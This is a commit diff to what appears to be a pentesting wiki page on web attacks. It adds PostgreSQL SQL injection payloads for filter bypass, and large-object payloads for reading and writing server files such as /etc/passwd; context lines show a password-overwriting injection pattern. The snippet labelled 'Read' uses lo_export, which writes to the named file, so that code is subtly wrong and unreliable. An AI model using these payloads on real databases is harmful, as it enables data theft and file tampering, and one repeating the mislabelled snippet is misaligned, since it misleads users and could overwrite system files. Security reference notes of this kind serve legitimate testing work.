Update: sqlinjection part with postgresql payload (#20)

* doc: update sqlinjection part with postgresql payload

* clean

wiki/Web.md

@@ -121,6 +121,9 @@ username[$eq]=admin&password[$eq]=admin
 > SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
 > It generally allows an attacker to view data that they are not normally able to retrieve. - [Source](https://portswigger.net/web-security/sql-injection)
 
+
+Interesting [cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet) of Port Swigger.
+
 ## Manual
 ### Common pattern
 ```
@@ -152,6 +155,25 @@ admin", "") ON DUPLICATE KEY UPDATE password="newpasswd";
 " ; SELECT * FROM users
 ```
 
+### Interesting postgres function
+
+#### Filter bypass
+```
+query_to_xml('SELECT * FROM users', true, false, '')
+ts_stat('SELECT * FROM users')::text
+```
+
+#### Arbitrary read / write
+```
+# Read
+lo_export(31337, '/etc/passwd')
+lo_get(31337)
+
+# Write
+lo_from_bytea(31338, decode('bG9saXBvcAo=', 'base64'))
+lo_export(31338, '/tmp/lolipop')
+```
+
 ## SQLmap
 > SQLmap is a tool that automates the process of detecting and exploiting SQL injection.